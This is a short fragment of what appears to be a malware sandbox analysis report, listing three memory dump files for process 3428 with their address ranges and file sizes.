                                              • memory/3428-83-0x00007FF86FE03000-0x00007FF86FE05000-memory.dmp

                                                Filesize

                                                8KB

                                              • memory/3428-243-0x00007FF86FE00000-0x00007FF8708C2000-memory.dmp

                                                Filesize

                                                10.8MB

                                              • memory/3428-92-0x0000015512C80000-0x0000015512CA2000-memory.dmp

                                                Filesize

                                                136KB